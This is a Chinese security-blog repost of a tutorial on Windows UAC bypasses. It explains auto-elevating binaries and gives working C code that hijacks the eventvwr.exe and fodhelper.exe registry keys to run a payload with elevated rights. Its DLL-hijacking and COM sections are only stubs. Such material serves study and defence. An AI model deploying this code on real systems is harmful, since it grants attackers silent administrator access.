UAC绕过技术——权限提升的艺术

admin
admin
admin
0
文章
0
评论
2026-04-27 04:34:34 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文详细解析WindowsUAC机制及其绕过技术,重点阐述白名单程序利用、DLL劫持和COM对象三种主流绕过方法,并以eventvwr.exe和fodhelper.exe为例给出具体代码实现,旨在帮助渗透测试人员理解权限提升原理并掌握实战应用技巧。 综合评分: 78 文章分类: 渗透测试,红队,内网渗透,免杀,实战经验

cover_image

UAC绕过技术——权限提升的艺术

原创

pandazhengzheng pandazhengzheng

安全分析与研究

2026年4月3日 08:30 广东

在小说阅读器读本章

去阅读

一、前言概述

UAC(User Account Control)是Windows的安全特性,用于限制应用程序的权限。本课将深入介绍UAC机制和绕过技术。

二、相关内容

2.1 UAC机制详解

UAC定义:UAC是Windows的安全特性,用于限制应用程序的权限,防止恶意软件在用户不知情的情况下获得管理员权限。

UAC工作流程:

用户启动需要管理员权限的程序
       │
       ▼
检查清单(白名单、自动提升)
       │
       ├──── 在白名单中 ────▶ 自动提升
       ├──── 自动提升 ────▶ 自动提升
       └──── 其他 ────▶ 弹出UAC提示

UAC级别:

  • 始终通知:最高级别
  • 默认:默认级别
  • 仅当程序尝试更改时通知:中等级别
  • 从不通知:最低级别

2.2 UAC绕过技术

2.2.1 白名单绕过

原理:某些Windows程序在UAC白名单中,可以自动提升权限。

常见白名单程序:

  • compmgmt.msc
  • eventvwr.exe
  • fodhelper.exe
  • sdclt.exe
  • wsreset.exe

示例:eventvwr.exe绕过:

void UACBypass_Eventvwr() {
    HKEY hKey;
    RegCreateKeyExA(HKEY_CURRENT_USER,
                    "Software\\Classes\\mscfile\\shell\\open\\command",
                    0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL);

    constchar* maliciousPath = "C:\\malicious.exe";
    RegSetValueExA(hKey, NULL, 0, REG_SZ, (LPBYTE)maliciousPath, strlen(maliciousPath) + 1);

    RegCloseKey(hKey);

    WinExec("eventvwr.exe", SW_HIDE);

    Sleep(5000);

    RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\mscfile");
}

示例:fodhelper.exe绕过:

void UACBypass_Fodhelper() {
    HKEY hKey;
    RegCreateKeyExA(HKEY_CURRENT_USER,
                    "Software\\Classes\\ms-settings\\Shell\\Open\\command",
                    0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL);

    constchar* maliciousPath = "C:\\malicious.exe";
    RegSetValueExA(hKey, NULL, 0, REG_SZ, (LPBYTE)maliciousPath, strlen(maliciousPath) + 1);

    RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (LPBYTE)"", 1);

    RegCloseKey(hKey);

    WinExec("fodhelper.exe", SW_HIDE);

    Sleep(5000);

    RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings");
}

2.2.2 DLL劫持绕过

原理:某些白名单程序会加载特定DLL,通过DLL劫持可以执行恶意代码。

2.2.3 COM对象绕过

原理:某些COM对象可以提升权限,利用这些COM对象可以绕过UAC。

2.3 实战案例分析

2.3.1 案例1:使用eventvwr.exe绕过UAC

攻击场景:攻击者已获得普通用户权限,需要提升到管理员权限执行后续操作。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全分析与研究 pandazhengzheng pandazhengzheng《UAC绕过技术——权限提升的艺术》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0